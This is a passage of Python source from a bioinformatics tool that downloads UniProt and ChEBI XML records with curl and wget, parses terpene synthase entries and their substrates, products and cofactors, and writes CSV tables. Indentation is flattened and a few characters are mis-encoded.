# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'CHEBI:28660', 'type': 'ChEBI'} None
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'CHEBI:33019', 'type': 'ChEBI'} None
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': 'CHEBI:58057', 'type': 'ChEBI'} None
# Level 3: {http://uniprot.org/uniprot}dbReference {'id': '4.2.3.119', 'type': 'EC'} None
if event == 'end' and child.tag == '{http://uniprot.org/uniprot}organism':
if subchild.tag == '{http://uniprot.org/uniprot}lineage':
if sschild.tag == '{http://uniprot.org/uniprot}taxon':
_lineage += [sschild.text]
# if event == 'end' and subchild.tag == '{http://uniprot.org/uniprot}reaction':
# # this pushes te caches too early before the cofactor annotation is parsed
# # when hitting a second '<comment type="catalytic activity">' entry or end of file or a new Uniprot entry item, process the previously collected data
# if myoptions.debug:
# print("Debug: %s: Pushing out the buffer contents after reaching end of reaction tag event=%s, child=%s, subchild=%s" % (_primary_accession, event, str(child), str(subchild)))
# process_delayed_buffers(_primary_accession, _chebi_ids_local, _rhea_ids_local, _ec_numbers_local, _reactions_local, _cofactor_ids_local, _cofactors_local, _chebi_ids_per_entry, _rhea_ids_per_entry, _ec_numbers_per_entry, _reactions_per_entry, _cofactor_ids_per_entry, _cofactors_per_entry)
#
# # make sure to empty the buffer for another reaction tag branch
# _chebi_ids_local = []
# _rhea_ids_local = []
# _ec_numbers_local = []
# _reactions_local = []
# _cofactor_ids_local = []
# _cofactors_local = []
if _primary_accession and not _recommended_name and not _alternative_names and not _submitted_name:
# <uniprot xmlns="http://uniprot.org/uniprot" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://uniprot.org/uniprot http://www.uniprot.org/support/docs/uniprot.xsd">
# <entry created="2011-10-19" dataset="TrEMBL" modified="2021-04-07" version="68">
# <accession>G1JUH4</accession>
# <name>G1JUH4_SOLLC</name>
# <protein>
# <submittedName>
# <fullName evidence="4 5">Beta myrcene/limonene synthase</fullName>
# </submittedName>
raise ValueError("No protein descriptions were parsed for _primary_accession=%s which is %d-th entry from %s" % (str(_primary_accession), _item_counter, filename))
_item_counter += 1
def create_cache(cachedir=".TPSdownloader_cache"):
"make local caching directory for input XML files"
if not os.path.exists(cachedir):
os.mkdir(cachedir)
for subdir in ('uniprot', 'chebi'):
if not os.path.exists(cachedir + os.path.sep + subdir):
os.mkdir(cachedir + os.path.sep + subdir)
def downloader(cmdline):
print("Info:", cmdline)
_args = shlex_split(cmdline)
_stdout, _stderr = Popen(_args, shell=False, stdout=PIPE, stderr=PIPE).communicate()
if _stderr and _stderr[0]:
sys.stderr.write("Error: '%s' gave '%s'\n" % (cmdline, str(_stderr)))
sys.stdout.flush()
sys.stderr.flush()
time.sleep(30)
#_handle = curl.Curl(base_url="https://www.uniprot.org/uniprot/" + myid)
#_myfile = open(path + myid + ".xml", 'wb')
#_myfile.write(_handle.get())
#_myfile.close()
def downloader_wrapper(myid, dbname, cachedir, url):
"""curl cannot fetch https://www.uniprot.org/uniprot/Q5Gj59.xml
but wget can as it accepts redirect to the primary entry. But we
do not want to store the primary entry under the filename of the
secondary at least. Let's hope we get to the primary entry ID via
another path.
Note, there was a typo in Q5Gj59 with lower-case 'j' in there.
"""
if cachedir[-1] != os.path.sep:
_cachedir = cachedir + os.path.sep + dbname + os.path.sep
else:
_cachedir = cachedir + dbname + os.path.sep
if dbname == 'uniprot' and url[-1] != '/':
url += '/'
if os.path.exists(_cachedir):
_filename = _cachedir + myid + ".xml"
if os.path.exists(_filename) and not os.path.getsize(_filename):
os.remove(_filename)
if not os.path.exists(_filename):
#print("Debug: fetching %s from uniprot" % myid)
# older curl version do not support --no-progress-meter
_cmdline = "curl --silent --show-error -o " + _filename + " " + url + myid
if dbname == 'uniprot':
_cmdline += ".xml"
downloader(_cmdline)
# curl does not follow redirects if we asked for a secondary/alias accession
# --2021-05-12 22:49:30-- https://www.uniprot.org/uniprot/D8R8K9.xml
# Pลesmฤrovรกno na: /uniprot/G9MAN7.xml [nรกsleduji]
# --2021-05-12 22:49:30-- https://www.uniprot.org/uniprot/G9MAN7.xml
if os.path.exists(_filename) and not os.path.getsize(_filename):
sys.stderr.write("Error: Failed to download XML data using '%s' command, re-trying with wget\n" % _cmdline)
os.remove(_filename)
_cmdline = "wget --no-proxy --directory-prefix=" + _cachedir + " --max-redirect=1 -o " + _filename + ".log " + url + myid
if dbname == 'uniprot':
_cmdline += ".xml"
downloader(_cmdline)
# could also prettyprint the XML files using
# xml_pp -i.bak _filename
else:
if myoptions.debug:
sys.stderr.write("Debug: File %s already exists\n" % _filename)
else:
sys.stderr.write("Error: Directory %s does not exist\n" % _cachedir)
def download_uniprot(myid, path=".TPSdownloader_cache" + os.path.sep + 'uniprot' + os.path.sep):
"""Download a page like
https://www.uniprot.org/uniprot/A0A2K9RFZ2.xml
https://www.uniprot.org/uniprot/D8R8K9.xml
Some entries have multiple Accessions, like
<accession>Q6XDB5</accession>
<accession>C0PT91</accession>
<name>TPSD2_PICSI</name>
<entry created="2019-07-03" dataset="Swiss-Prot" modified="2020-08-12" version="27">
<accession>A0A1D6LTV0</accession>
<accession>A5YZT5</accession>
<accession>B4F964</accession>
<accession>C0PNL6</accession>
<name>TPS26_MAIZE</name>
<protein>
<recommendedName>
<fullName evidence="8">Alpha-terpineol synthase, chloroplastic</fullName>
<ecNumber evidence="7">4.2.3.111</ecNumber>
</recommendedName>
<alternativeName>
<fullName evidence="8">4-terpineol synthase</fullName>
<ecNumber evidence="7">4.2.3.-</ecNumber>
</alternativeName>
<alternativeName>
<fullName evidence="8">Alpha-terpinolene synthase</fullName>
<ecNumber evidence="7">4.2.3.113</ecNumber>
</alternativeName>
<alternativeName>
<fullName evidence="8">Beta-myrcene synthase</fullName>
<ecNumber evidence="7">4.2.3.15</ecNumber>
</alternativeName>
<alternativeName>
<fullName evidence="8">Gamma-terpinene synthase</fullName>
<ecNumber evidence="7">4.2.3.114</ecNumber>
</alternativeName>
<alternativeName>
<fullName evidence="8">Limonene synthase</fullName>
<ecNumber evidence="7">4.2.3.16</ecNumber>
</alternativeName>
<alternativeName>
<fullName evidence="9">Terpene synthase 26, chloroplastic</fullName>
</alternativeName>
"""
downloader_wrapper(myid, 'uniprot', ".TPSdownloader_cache" + os.path.sep, "https://www.uniprot.org/uniprot/")
return ".TPSdownloader_cache" + os.path.sep + 'uniprot' + os.path.sep + myid + '.xml'
def download_chebi(myid, path=".TPSdownloader_cache" + os.path.sep + 'chebi' + os.path.sep):
"""Download a page like https://www.ebi.ac.uk/chebi/saveStructure.do?xml=true&chebiId=58622
ChEBI also provides SQL dumps, probably an overkill for our
purpose.
"""
if isinstance(myid, list):
for _myid in set(myid):
if _myid:
downloader_wrapper(_myid, 'chebi', ".TPSdownloader_cache" + os.path.sep, "https://www.ebi.ac.uk/chebi/saveStructure.do?xml=true&chebiId=")
elif myid:
downloader_wrapper(myid, 'chebi', ".TPSdownloader_cache" + os.path.sep, "https://www.ebi.ac.uk/chebi/saveStructure.do?xml=true&chebiId=")
def process_chebi(chebi_id, chebi_dict_of_lists):
download_chebi(chebi_id)
_filename = ".TPSdownloader_cache" + os.path.sep + 'chebi' + os.path.sep + chebi_id + '.xml'
if os.path.exists(_filename) and os.path.getsize(_filename):
try:
_chebi_id2, _names, _definition, _formula, _smiles = parse_chebi_xml(_filename)
except RuntimeError as e:
if not os.path.exists(_filename) and os.path.exists(_filename + ".bad"):
sys.stderr.write("Warning: Failed to parse file %s , will re-fetch after 600 sec delay. Error was: %s\n" % (str(_filename), str(e.with_traceback)))
time.sleep(600)
_chebi_id2, _names, _definition, _formula, _smiles = parse_chebi_xml(_filename)
if _formula and myoptions.run_mode == 'terpene_synthases':
_terpene_type = classify_terpene(_formula[0]) # TODO: adjust to the inefficient hack and get rid of the unnecessary list wrapping the single value
else:
_terpene_type = None
else:
_terpene_type = None
if _smiles and myoptions.run_mode == 'terpene_synthases':
try:
# make sure rdkit was imported at all
_cyclic = is_cyclic(_smiles)
except ImportError:
_cyclic = None
else:
_cyclic = None
if _chebi_id2 and _chebi_id2 not in chebi_dict_of_lists['ChEBI ID']:
chebi_dict_of_lists['ChEBI ID'].append(_chebi_id2)
chebi_dict_of_lists['Compound name'].append(_names)
chebi_dict_of_lists['Compound description'].append(_definition)
chebi_dict_of_lists['Formula'].append(_formula)
chebi_dict_of_lists['SMILES'].append(_smiles)
if _terpene_type:
chebi_dict_of_lists['Type (mono, sesq, di, โฆ)'].append(_terpene_type)
else:
chebi_dict_of_lists['Type (mono, sesq, di, โฆ)'].append('')
if _cyclic:
chebi_dict_of_lists['cyclic/acyclic'].append('cyclic')
else:
chebi_dict_of_lists['cyclic/acyclic'].append('')
if myoptions.debug: print("Debug: %s: process_chebi(): _terpene_type=%s" % (chebi_id, str(_terpene_type)))
return _terpene_type
def print_df(df):
"""
label=='Uniprot ID'
label=='Name'
"""
for label, content in df.items():
print(f'label: {label}')
print(f'content: {content}', sep='\n')
def write_csv_and_xls(df, suffix='', datetime=None):
"""Write CSV output, per one Uniprot ID A0A2K9RFZ2 output even
multiple lines if there are multiple reactions catalyzed
https://www.uniprot.org/uniprot/A0A2K9RFZ2
https://www.ebi.ac.uk/chebi/searchId.do?chebiId=CHEBI:58622
"""
if not datetime:
_datetime = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
else:
_datetime = datetime
df.to_csv("TPSdownloader_" + suffix + _datetime + ".csv", index=False)
# df.to_excel("TPSdownloader_" + _datetime + ".xls", sheet_name="Sheet1", index=False)
print("Info: Wrote TPSdownloader_" + suffix + _datetime + ".csv file.")
def sanitize_input_text_values(i):
"Convert string representation of pythonic values into real python datatypes."
if i is np.NaN:
_i = ''
elif i is None:
_i = ''
else:
_i = i
if _i is np.NaN:
_i = ''
elif _i is None:
return ''
elif _i == 'nan':
return ''
elif str(_i) == 'nan':
return ''
elif i and isinstance(i, bool):
return True
elif not i and isinstance(i, bool):
return ''
elif i and isinstance(i, str):
_i = i.strip().replace('\n','').replace('\t',' ').replace(' ',' ')
if _i.startswith('[') and _i.endswith(']'):
_i = parse_list_or_set(_i) # split the list text representation into entries
else:
_i = [_i]
elif _i and isinstance(i, float):
_i = int(_i)
if not _i:
return ''
else:
return _i
def parse_storage(filename):
"""Parse the manually curated XLS(X) table with terpene synthases into memory, into
pythonic lists and sets. We copy whole columns in a single sweep but have to revisit
some entries one-by-one (fix 'Amino acid sequence' described further below).
The original idea to parse manually curated table into memory and add to the table
only new rows is currently not feasible. The columns have different naming and
the manually curated tables contains several groups of rows for substrate, product
and cofactors, all of the should be basically in separate ChEBI table rows. Also
same Uniprot ID appears may appear on multiple rows and we record only its very
first instance - the dictionary used to keep track of the Uniprot ID allows only
one Uniprot ID as a key. Lots would have to be rewamped.
Undoing this JOIN is not as simple as I thought.
We parse out of the table just some unchanged columns, like 'Uniprot ID' and
'Product ChEBI ID' which is incidentally still under a column named 'ChEBI ID'.
The substrate-related ChEBI ID is under a column 'Substrate ChEBI ID' so it does
not mess up with the product IDs.
Prevent typo errors and upper-case all letters in Uniprot ID.
The ChEBI IDs are stored just as an integer to be prefixed by 'CHEBI:'. While parsing
the XLSX storage we have to prepend the 'CHEBI:' string in from of the float()
value returned by Pandas.
Another issue is that 'Amino acid sequence' values are due to copy&paste trickery
sometimes split over multiple lines with newlines and spaces and are a list of strings
instead of just a single string. We have to sanitize that as well.
['MEPELTVPPLFSPIRQAIHPKHADIDVQTAAWAETFRIGSEELRGKLVTQDIGTFSARIL\n PEGREEVVSLLADFILWLFGVDDGHCEEGELGHRPGDLAGLLHRLIRVAQNPEAPMMQDD\n PLAAGLRDLRMRVDRFGTAGQTARWVDALREYFFSVVWEAAHRRAGTVPDLNDYTLMRLY\n DGATSVVLPMLEMGHGYELQPYERDRTAVRAVAEMASFIITWDNDIFSYHKERRGSGYYL\n NALRVLEQERGLTPAQALDAAISQRDRVMCLFTTVSEQLAEQGSPQLRQYLHSLRCFIRG\n AQDWGISSVRYTTPDDPANMPSVFTDVPTDDSTEPLDIPAVSWWWDLLAEDARSVRRQVP\n AQRSA']
Still, Pandas skip two cells in a Notes column, do not know why.
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.notna.html#pandas.DataFrame.notna
"""
_uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists = initialize_data_structures()
_storage_df = pd.read_excel(filename, 'Sheet1', index_col=None, na_filter=True, keep_default_na=True, na_values=[' ', '\t', 'NULL', 'nan', 'null', 'n/a', 'NaN']).fillna('') # skip_blank_lines=False was removed from newer Pandas)
_chebi_columns_without_chebi_id = ['Compound name', 'Compound description', 'Formula', 'SMILES', 'Type (mono, sesq, di, โฆ)', 'cyclic/acyclic']
_len = len(_storage_df['Uniprot ID'])
for _colname in ['Uniprot ID', 'Uniprot secondary ID', 'ChEBI ID', 'Name', 'Alternative names', 'Submitted name', 'Description', 'Species', 'Taxonomy', 'Amino acid sequence', 'Kingdom (plant, fungi, bacteria)', 'Notes', 'Publication (URL)', 'Substrate ChEBI IDs', 'Product ChEBI IDs', 'Cofactor ChEBI IDs', 'Cofactors'] + extra_product_colnames + extra_substrate_colnames + ['EC numbers', 'Rhea IDs', 'Reactions']:
if _colname in ['Notes']:
sys.stderr.write("Warning: Zapping up contents of column %s from %s file\n" % (_colname, filename))
_uniprot_dict_of_lists[_colname].extend(_len * [''])
elif _colname in _storage_df.keys():
for _val in _storage_df[_colname]: # Pandas skip empty values from the input XLSX fields!
_val_upper = _val.upper()
if (_colname == 'Uniprot ID' or _colname == 'Uniprot secondary ID') and _val_upper != _val:
# Q5Gj59
raise ValueError("%s: There is a lowercase letter in the Uniprot ID" % _val)
elif _colname == 'Amino acid sequence':
_uniprot_dict_of_lists[_colname].append(''.join(_val).replace('\n','').replace(' ','').upper())
elif _colname == 'ChEBI ID':
if not _val or _val is np.NaN or _val =='nan':
_uniprot_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
elif _val:
try:
_val = sanitize_input_text_values("CHEBI:%i" % _val)
_uniprot_dict_of_lists[_colname].extend(_val)
except ValueError:
_uniprot_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
else:
raise ValueError("Unexpected datatype in 'ChEBI ID' column: %s" % str(_val))
elif _colname not in _uniprot_dict_of_lists.keys():
if not _val:
_uniprot_dict_of_lists[_colname] = ['']
else:
_uniprot_dict_of_lists[_colname].extend(sanitize_input_text_values(_val))
elif _val:
_uniprot_dict_of_lists[_colname].extend(sanitize_input_text_values(_val))
else:
_uniprot_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
else:
sys.stderr.write("Warning: File %s lacks column %s\n" % (filename, _colname))
_uniprot_dict_of_lists[_colname].extend(_len * [''])
for _colname in ['ChEBI ID'] + _chebi_columns_without_chebi_id:
if _colname in _storage_df.keys():
for _val in _storage_df[_colname]:
if _colname == 'ChEBI ID':
if not _val or _val is np.NaN or _val == 'nan':
_chebi_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
elif _val:
try:
_val = sanitize_input_text_values("CHEBI:%i" % _val)
_chebi_dict_of_lists[_colname].extend(_val)
except ValueError:
_chebi_dict_of_lists[_colname].extend(['']) # silly python needs this wrapped into a list otherwise it silently ignores the empty value
else:
raise ValueError("Unexpected datatype in 'ChEBI ID' column: %s" % str(_val))
else:
_chebi_dict_of_lists[_colname].append(sanitize_input_text_values(_val))
else:
sys.stderr.write("Warning: File %s lacks column %s\n" % (filename, _colname))
_chebi_dict_of_lists[_colname].extend(_len * [''])
del(_storage_df)
print("Info: Parsed all data from Sheet1 of %s into memory" % filename)
return _uniprot_dict_of_lists, _chebi_dict_of_lists, _copy_without_chebi_id, _empty_template_dict_of_lists
def recursive_translator(mylist, chebi_col, uniprot_col, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry):
_res = []
if mylist and isinstance(mylist, list):
for x in mylist:
if myoptions.debug: print("Debug: recursive_translator(): chebi_col=%s, x=%s" % (str(chebi_col), str(x)))
if isinstance(x, list):
_res.extend(recursive_translator(x, chebi_col, uniprot_col, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry))
elif x:
if x in chebi_dict_of_lists['ChEBI ID']:
_index = chebi_dict_of_lists['ChEBI ID'].index(x)
if myoptions.debug: print("Debug: recursive_translator(): _index=%s" % str(_index))
if _index is None:
raise ValueError("Error: _index=%s, chebi_col=%s" % (str(_index), str(chebi_col)))
if chebi_col is None:
raise ValueError("Error: _index=%s, chebi_col=%s" % (str(_index), str(chebi_col)))
if chebi_dict_of_lists is None:
raise ValueError("Error: chebi_dict_of_lists is None, _index=%s, chebi_col=%s" % (str(_index), str(chebi_col)))
if myoptions.debug: print("Debug: recursive_translator(): chebi_dict_of_lists[chebi_col]=%s" % str(chebi_dict_of_lists[chebi_col]))
_some_res = chebi_dict_of_lists[chebi_col][_index]
if _some_res:
_res.extend(_some_res)
else:
# CHEBI:59720 - HPETE anion
# contains no SMILES and other fields at all
if x not in warn_once_per_chebi_entry:
# raise this warning just once per substance, makes no sense to have zillions of warning about
# CHEBI:15379: The column 'Compound description' contains '[]'
# Unfortunately this should be per ChEBI ID + chebi_col pair or, TODO:, be postponed to upper code,
# e.g. append_substrates_and_products() to append the x value to the list later after all warnings are issued,
# otherwise only one warning is issued for such ChEBI entry although more columns are problematic/empty
sys.stderr.write("Warning: %s: The column '%s' contains '%s'\n" % (str(x), str(chebi_col), str(_some_res)))
warn_once_per_chebi_entry.append(x)
else:
if myoptions.debug:
print("Debug: recursive_translator(): x=%s is not in chebi_dict_of_lists['ChEBI ID'], why?" % str(x))
if myoptions.debug:
print("Debug: recursive_translator(): _res=%s" % str(_res))
else:
if mylist and mylist in chebi_dict_of_lists['ChEBI ID']:
_index = chebi_dict_of_lists['ChEBI ID'].index(mylist)
_res.extend(chebi_dict_of_lists[chebi_col][_index])
else:
if myoptions.debug:
print("Debug: recursive_translator(): x=%s is not in chebi_dict_of_lists['ChEBI ID'], why??" % str(mylist))
return _res
def translator(extra_colnames, nestedlists, column_pairs, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry):
"Push the data for _product_ids, _substrate_ids, _cofactor_ids into uniprot_dict_of_lists"
if not nestedlists:
for _colname in extra_colnames:
uniprot_dict_of_lists[_colname].append('')
else:
for _chebi_col, _uniprot_col in column_pairs:
if myoptions.debug:
print(" nestedlists=%s" % str(nestedlists))
_res = recursive_translator(nestedlists, _chebi_col, _uniprot_col, uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry)
uniprot_dict_of_lists[_uniprot_col].append(_res)
if myoptions.debug:
print("Debug: translator(): uniprot_dict_of_lists[%s][-1]=%s, _chebi_col=%s, _uniprot_col=%s" % (_uniprot_col, str(uniprot_dict_of_lists[_uniprot_col][-1]), str(_chebi_col), str(_uniprot_col)))
def append_substrates_and_products(uniprot_dict_of_lists, chebi_dict_of_lists, _substrate_ids, _product_ids, warn_once_per_chebi_entry):
"""Put the ChEBI-derived data into variables dedicated to substrate, product or cofactor.
The variables contain same datatypes but to get the final table we triplicate the output
table columns. The ChEBI IDs were already written by upstream code.
"""
if not _product_ids:
for _colname in extra_product_colnames:
uniprot_dict_of_lists[_colname].append('')
else:
translator(extra_product_colnames, _product_ids, [['Compound name', 'Name of product'], ['Compound description', 'Product compound description'], ['Formula', 'Chemical formula of product'], ['SMILES', 'SMILES of product (including stereochemistry)']], uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry)
if not _substrate_ids:
for _colname in extra_substrate_colnames:
uniprot_dict_of_lists[_colname].append('')
else:
translator(extra_substrate_colnames, _substrate_ids, [['Compound name', 'Substrate (including stereochemistry)'], ['Compound description', 'Substrate compound description'], ['Formula', 'Chemical formula of substrate'], ['SMILES', 'SMILES of substrate (including stereochemistry)']], uniprot_dict_of_lists, chebi_dict_of_lists, warn_once_per_chebi_entry)
def get_cyclic_terpene_synthases(primary_accession, reactions, ec_numbers, rhea_ids, chebi_ids, chebi_dict_of_lists):
"""Parse ChEBI ID values mentioned in the UniProt record under
<comment type="catalytic activity">
</comment>
tag. From there we parse out practically only ChEBI IDs for water,
the ions are not annotated there.
Cofactors are annotated under
<comment type="cofactor">
<cofactor evidence="1">
<name>Mg(2+)</name>
<dbReference type="ChEBI" id="CHEBI:18420"/>
</cofactor>
</comment>
tag.
We should either merge them together or just use only the latter.
"""
_substrate_ids = []
_product_ids = []
_cofactor_ids = []
# now iterate over all reactions and process (reactions, ec_numbers, rhea_ids, chebi_ids) simultaneously
for _reaction, _ec_number, _rhea_id, _chebi_id in zip(reactions, ec_numbers, rhea_ids, chebi_ids):
if myoptions.debug:
print("Debug: get_cyclic_terpene_synthases(): %s: unzipped values from (reactions=%s, ec_numbers=%s, rhea_ids=%s, chebi_ids=%s)" % (primary_accession, str(_reaction), str(_ec_number), str(_rhea_id), str(_chebi_id)))
split_chebi_data_into_substrates_and_products_wrapper(primary_accession, chebi_dict_of_lists, _chebi_id, _substrate_ids, _product_ids)
if myoptions.debug:
print("Debug: get_cyclic_terpene_synthases(): %s: resulting in _substrate_ids=%s, _cofactor_ids=%s, _product_ids=%s" % (primary_accession, str(_substrate_ids), str(_cofactor_ids), str(_product_ids)))
return natsorted(_substrate_ids), natsorted(_product_ids)
def process_parsed_uniprot_values(all_uniprot_ids, all_chebi_ids, uniprot_dict_of_lists, chebi_dict_of_lists, already_parsed, primary_accession, secondary_accessions, chebi_ids, rhea_ids, ec_numbers, reactions, cofactor_ids, cofactors, recommended_name, alternative_names, submitted_name, feature_descriptions, organism, lineage, sequence, uniprot_pri_acc2aliases, uniprot_aliases2pri_acc, primaries, warn_once_per_chebi_entry):
"""Process a single Uniprot entry along with getting data from ChEBI-dictlist.
"""
if myoptions.debug:
print("Debug: process_parsed_uniprot_values(): primary_accession=%s, reactions=%s, ec_numbers=%s, rhea_ids=%s, chebi_ids=%s, len(chebi_dict_of_lists['ChEBI ID'])=%s" % (str(primary_accession), str(reactions), str(ec_numbers), str(rhea_ids), str(chebi_ids), len(chebi_dict_of_lists['ChEBI ID'])))
_substrate_ids, _product_ids = get_cyclic_terpene_synthases(primary_accession, reactions, ec_numbers, rhea_ids, chebi_ids, chebi_dict_of_lists)
_already_parsed_aliases = [x for x in secondary_accessions if x in already_parsed]
if primary_accession not in primaries:
primaries.append(primary_accession)
if primary_accession and primary_accession not in already_parsed and primary_accession not in _already_parsed_aliases:
# parse values for ChEBI entries mentioned in the UniProt record
if myoptions.debug:
print("Debug: Storing parsed values for Uniprot entry %s into uniprot_dict_of_lists" % primary_accession)
if primary_accession not in all_uniprot_ids:
all_uniprot_ids.update([primary_accession])
all_uniprot_ids.update(secondary_accessions)
if myoptions.debug:
print("Debug: process_parsed_uniprot_values(): chebi_ids=%s" % str(chebi_ids))
for _chebi_id in chebi_ids:
if _chebi_id: # discard '' values
if isinstance(_chebi_id, list): # BUG: seems sometimes we receive a nested list of values and sometimes just a list of values
for _my_chebi_id in _chebi_id:
all_chebi_ids.update(set(_chebi_id))
else:
all_chebi_ids.update(set(_chebi_id))
if secondary_accessions:
if primary_accession not in uniprot_pri_acc2aliases.values():
for _secondary_accession in secondary_accessions:
uniprot_aliases2pri_acc[_secondary_accession] = primary_accession
uniprot_pri_acc2aliases[primary_accession] = secondary_accessions
uniprot_dict_of_lists['Uniprot ID'].append(primary_accession) # append a string value
uniprot_dict_of_lists['Uniprot secondary ID'].append(secondary_accessions) # append a list of string values
uniprot_dict_of_lists['ChEBI ID'].append(chebi_ids) # uniprot_dict_of_lists[ChEBI ID][-1]=[['CHEBI:15385', 'CHEBI:33019', 'CHEBI:175763']]
uniprot_dict_of_lists['EC numbers'].append(ec_numbers) # uniprot_dict_of_lists[EC numbers][-1]=['4.2.3.13']
uniprot_dict_of_lists['Rhea IDs'].append(rhea_ids) # uniprot_dict_of_lists[Rhea IDs][-1]=['RHEA:19525']
uniprot_dict_of_lists['Reactions'].append(reactions) # uniprot_dict_of_lists[Reactions][-1]=['(2E,6E)-farnesyl diphosphate = (1S,8aR)-delta-cadinene + diphosphate']
# When we parse a non-terpene-cyclase reaction we end up with a single reaction annotated but none of the ChEBI IDs gets assigned to a product
# In such scenarios downstream len() checks fail because len(uniprot_dict_of_lists['Product ChEBI IDs'][uniprot_id]) == 0 whereas len(uniprot_dict_of_lists['Reactions'][uniprot_id]) != 0
# for example Q50L36
uniprot_dict_of_lists['Substrate ChEBI IDs'].append(_substrate_ids) # uniprot_dict_of_lists[Substrate ChEBI IDs][-1]=[['CHEBI:175763']]
uniprot_dict_of_lists['Cofactor ChEBI IDs'].append(cofactor_ids) # uniprot_dict_of_lists[Cofactor ChEBI IDs][-1]=[[]]
uniprot_dict_of_lists['Cofactors'].append(cofactors)
uniprot_dict_of_lists['Product ChEBI IDs'].append(_product_ids) # uniprot_dict_of_lists[Product ChEBI IDs][-1]=[['CHEBI:15385']]
append_substrates_and_products(uniprot_dict_of_lists, chebi_dict_of_lists, _substrate_ids, _product_ids, warn_once_per_chebi_entry)
uniprot_dict_of_lists['Name'].append(recommended_name) # For compatibility with Adela I stick here to 'Name' column name
uniprot_dict_of_lists['Alternative names'].append(alternative_names)
uniprot_dict_of_lists['Submitted name'].append(submitted_name)
uniprot_dict_of_lists['Description'].append(feature_descriptions)
uniprot_dict_of_lists['Species'].append(organism)
uniprot_dict_of_lists['Taxonomy'].append(lineage)
uniprot_dict_of_lists['Amino acid sequence'].append(sequence)
_taxlen = len(lineage)
if not lineage:
_kingdom = ''
elif 'Bacteria' == lineage[0]: # some taxons are only assigned as ['Bacteria'], without further specs
_kingdom = 'Bacteria'
elif 'Archaea' == lineage[0]: # some taxons are only assigned as ['Archaea'], without further specs
_kingdom = 'Archaea'
elif _taxlen > 1 and 'Viridiplantae' == lineage[1]:
_kingdom = 'Plantae'
elif _taxlen > 1 and 'Fungi' == lineage[1]:
_kingdom = 'Fungi'
elif 'Homo sapiens' in lineage:
_kingdom = 'Human'
elif 'Animalia' in lineage:
_kingdom = 'Animal'
else:
_kingdom = 'unknown'
uniprot_dict_of_lists['Kingdom (plant, fungi, bacteria)'].append(_kingdom)
uniprot_dict_of_lists['Notes'].append('') # BUG
uniprot_dict_of_lists['Publication (URL)'].append('') # BUG
already_parsed.append(primary_accession)
else:
if primary_accession not in already_parsed:
already_parsed.append(primary_accession)
if myoptions.xls_storage and myoptions.xls_storage !='None':
print("Info: %s: Accession or its secondary accessions %s already parsed from %s file and is in already_parsed=%s" % (primary_accession, str(secondary_accessions), myoptions.xls_storage, str(already_parsed)))
else:
sys.stderr.write("Warning: %s: Accession used in %s file is actually one of its secondary aliases %s\n" % (primary_accession, myoptions.xls_storage, str(secondary_accessions)))
_l = len(uniprot_dict_of_lists['Uniprot ID'])
for x in uniprot_dict_of_lists.keys():
if myoptions.verbose:
print("Info: %s: uniprot_dict_of_lists['%s'] has length %d" % (primary_accession, x, len(uniprot_dict_of_lists[x])))
if myoptions.debug:
print("Debug: process_parsed_uniprot_values(): %s: uniprot_dict_of_lists['%s'][-1]=%s" % (primary_accession, x, str(uniprot_dict_of_lists[x][-1])))
if _l != len(uniprot_dict_of_lists[x]):
if myoptions.debug:
print("Debug: process_parsed_uniprot_values(): %s: uniprot_dict_of_lists['%s']=%s" % (primary_accession, x, str(uniprot_dict_of_lists[x])))
raise ValueError("len(uniprot_dict_of_lists['Uniprot ID'])=%d != len(uniprot_dict_of_lists['%s'])=%d" % (len(uniprot_dict_of_lists['Uniprot ID']), x, len(uniprot_dict_of_lists[x])))
def fetch_ids_from_xlsx(filename, primaries, uniprot_pri_acc2aliases, uniprot_aliases2pri_acc, uniprot_dict_of_lists, already_parsed, all_uniprot_ids, all_chebi_ids):
_ids = []
_aliases = uniprot_pri_acc2aliases.values()
_df = pd.read_excel(filename, 'Sheet1', index_col=None, na_values=["NA"])
for i in _df['Uniprot ID']:
_sub_i = sanitize_input_text_values(i)
if len(_sub_i) > 1:
for _ii in _sub_i:
print("Info: Looping over %s from %s, originates from %s" % (_ii, filename, str(i)))
_id = None
# remove redundancies but keep ordering
if _ii is not None and _ii not in already_parsed:
# check if this is a primary accession, if not, convert it to primary
if _ii in primaries:
# already known primary accession, probably already in cache but maybe inferred from other sources
_filename = download_uniprot(_ii)
_id = _ii
elif _ii in _aliases:
# is a secondary/alias accession
_iii = uniprot_aliases2pri_acc[_ii]
_id = str(_iii)
if _iii in already_parsed:
# we already have parsed the primary acc uniprot entry into memory
# for safety re-try fetching the data if it is not in the cache
print("Info: Entry %s is an alias pointing to %s which we already have, skipping download" % (_ii, _iii))
# _filename = download_uniprot(_id)
_filename = None # prevent duplicated parsing of the input XML
elif _iii not in uniprot_aliases2pri_acc.keys():
print("Info: Entry %s is an alias pointing to %s which we already have, also skipping download" % (_ii, _iii))
_filename = download_uniprot(_iii)
#_filename = None
else:
# new or already known primary accession
print("Info: Entry %s is new primary accession, downloading if not existing yet" % (_ii))
_filename = download_uniprot(_ii)
_id = _ii
if _id and _id not in _ids:
_ids.append(_id)
else:
# there are no secondary accessions
if _sub_i[0] and _sub_i[0] not in _ids:
_ids += _sub_i
if _sub_i[0] not in already_parsed:
_filename = download_uniprot(_sub_i[0])
print("Info: Entry %s was already parsed into memory, skipping single-entry XML download." % (_sub_i[0]))
return _ids
_r1 = re.compile(r'C[0-9]+')
def classify_terpene(formula):
# CHEBI:140564 ฮด-cadinene C15H24
# CHEBI:15385 (+)-ฮด-cadinene C15H24
